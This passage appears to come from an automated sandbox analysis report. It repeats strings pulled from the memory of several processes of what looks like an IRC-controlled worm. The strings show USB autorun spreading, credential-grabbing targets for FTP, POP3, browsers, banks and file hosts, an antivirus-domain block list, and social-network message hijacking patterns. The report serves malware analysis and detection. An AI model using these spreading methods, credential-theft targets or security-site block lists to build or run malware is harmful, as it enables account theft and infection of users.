            Source: 25F.tmp.exe, 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL 
'%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: 25F.tmp.exe, 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: 25F.tmp.exe, 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: WmiPrvSE.exe, 00000008.00000003.383827255.0000000000C50000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: WmiPrvSE.exe, 00000008.00000003.383827255.0000000000C50000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: WmiPrvSE.exe, 00000008.00000003.383827255.0000000000C50000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL 
'%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: WmiPrvSE.exe, 00000008.00000003.383827255.0000000000C50000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: WmiPrvSE.exe, 00000008.00000003.383827255.0000000000C50000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL 
'%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exe, 0000000A.00000002.620519404.0000000000180000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000000A.00000002.620519404.0000000000180000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 0000000A.00000002.620519404.0000000000180000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL 
'%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 0000000A.00000002.620519404.0000000000180000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 0000000A.00000002.620519404.0000000000180000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exe, 0000000B.00000002.620993011.0000000000380000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000000B.00000002.620993011.0000000000380000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 0000000B.00000002.620993011.0000000000380000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL 
'%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 0000000B.00000002.620993011.0000000000380000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 0000000B.00000002.620993011.0000000000380000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exe, 0000000C.00000002.621009440.0000000000410000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000000C.00000002.621009440.0000000000410000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 0000000C.00000002.621009440.0000000000410000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL 
'%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 0000000C.00000002.621009440.0000000000410000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
